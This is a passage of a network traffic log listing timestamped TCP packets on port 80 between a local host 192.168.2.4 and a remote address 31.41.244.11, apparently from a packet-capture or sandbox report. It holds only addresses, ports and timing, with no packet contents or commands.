Nov 5, 2024 18:46:10.057619095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.057626963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.069895983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.069952965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070000887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070009947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070035934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070051908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070064068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070075035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070085049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070095062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070106983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070128918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070182085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070193052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070203066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070216894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070225954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070225954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070244074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070277929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070395947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070405960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070415974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070430040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070441008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070442915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070451975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070463896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070465088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070475101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070476055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070486069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070496082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070508003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070530891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070714951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070725918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070735931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070748091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070758104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070759058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070770025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070777893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070780039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070790052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070801020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070804119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070811033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070822954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070828915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070835114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.070844889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070866108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.070885897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071074963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071086884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071096897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071106911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071116924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071120977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071127892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071139097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071145058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071151018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071157932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071162939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071171999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071182013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071183920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071194887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071207047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071208000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071228981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071249962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071382046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071393013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071404934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071424007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071435928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071438074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071444988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071449995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071460962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071470976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071472883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071485043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071485996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071495056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071511984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071526051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071537018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071537971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071566105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071650982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071667910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071682930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071695089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071696997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071706057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071717978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071722984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071727991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071738958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.071742058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071763992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.071778059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.076757908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076769114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076780081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076807976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.076833010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.076843977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076855898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076864958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076874971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076888084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.076893091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.076914072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.076977015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076989889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.076998949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077009916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077020884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077023029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077027082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077040911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077069044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077111959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077124119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077135086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077163935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077177048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077267885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077280045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077290058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077299118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077310085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077312946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077322006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077332973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077342987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077347040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077347040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077358007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077388048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077409983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077456951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077512026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077522039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077532053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077543020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077553988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077553988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077564955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077569008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077578068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077600956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077600956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077632904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077641964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077650070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077686071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077697039 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077718973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077728987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077738047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077749014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077759027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077774048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077790976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077800989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077805042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077811956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077822924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077832937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077837944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077843904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077864885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077919006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077936888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077945948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077955008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077979088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077980042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.077987909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.077999115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078003883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078012943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078025103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078052998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078115940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078125954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078135014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078149080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078155994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078161001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078170061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078175068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078177929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078187943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078202963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078238010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078319073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078361988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078419924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078434944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078453064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078460932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078463078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078471899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078474998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078485966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078500986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078500986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078511953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078583956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078594923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078604937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078613997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078624010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078630924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078645945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078645945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078648090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078659058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078669071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078674078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078685045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078696012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078700066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078700066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078736067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078784943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078797102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078807116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078818083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078841925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078847885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078857899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078864098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078867912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078886032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078896999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078902960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078907013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078907013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078923941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078924894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.078957081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.078974009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079022884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079035044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079046011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079056025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079065084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079092026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079124928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079133987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079144955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079155922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079165936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079169035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079189062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079211950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079241037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079251051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079262972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079282999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079297066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079303026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079308987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079330921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079349041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079350948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079360962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079389095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079406977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079426050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079436064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079453945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079464912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079468012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079477072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079492092 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079511881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079526901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079539061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079565048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079591036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079607964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079618931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079628944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079638958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079653978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079678059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079744101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079755068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079766035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079788923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079803944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079848051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079859018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079869032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079891920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079905987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079916000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079921961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079936981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079938889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079948902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079958916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079961061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079971075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079972029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.079982042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.079984903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080008030 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080040932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080233097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080245018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080259085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080277920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080303907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080336094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080347061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080355883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080374002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080377102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080385923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080394983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080404043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080430031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.080809116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080820084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080828905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080843925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080854893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.080857992 CET	49804	80	192.168.2.4	31.41.244.11
